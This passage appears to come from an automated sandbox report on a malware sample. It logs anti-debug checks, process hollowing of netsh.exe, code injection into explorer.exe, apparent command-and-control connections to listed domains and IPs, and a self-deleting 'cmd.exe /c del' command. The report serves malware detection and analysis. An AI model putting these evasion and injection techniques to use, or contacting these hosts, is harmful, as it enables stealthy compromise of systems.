          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03304015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03304015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03301074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03250050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03250050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03239080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03234F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03234F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03248794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03268E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03247E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03300EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03300EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03300EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03278EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03243D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03264D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03273D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032E3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03257D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03261DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03261DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03261DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_033005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_033005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03232D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\triage_dropped_file.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.22.47 80
          Source: C:\Windows\explorer.exeDomain query: www.inspectdecided.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.7 80
          Source: C:\Windows\explorer.exeDomain query: www.fengyat.club
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\triage_dropped_file.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 11F0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\triage_dropped_file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\triage_dropped_file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\triage_dropped_file.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\triage_dropped_file.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: unknown protection: read write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\triage_dropped_file.exeMemory written: C:\Users\user\Desktop\triage_dropped_file.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\triage_dropped_file.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\triage_dropped_file.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\triage_dropped_file.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess created: C:\Users\user\Desktop\triage_dropped_file.exe C:\Users\user\Desktop\triage_dropped_file.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: explorer.exe, 0000000C.00000000.323379874.0000000005EA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.296362261.00000000089FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.326748395.00000000089FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.313706142.00000000089FF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 0000000C.00000000.287389858.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.319675230.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.348327898.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.302787668.0000000001128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Users\user\Desktop\triage_dropped_file.exe VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
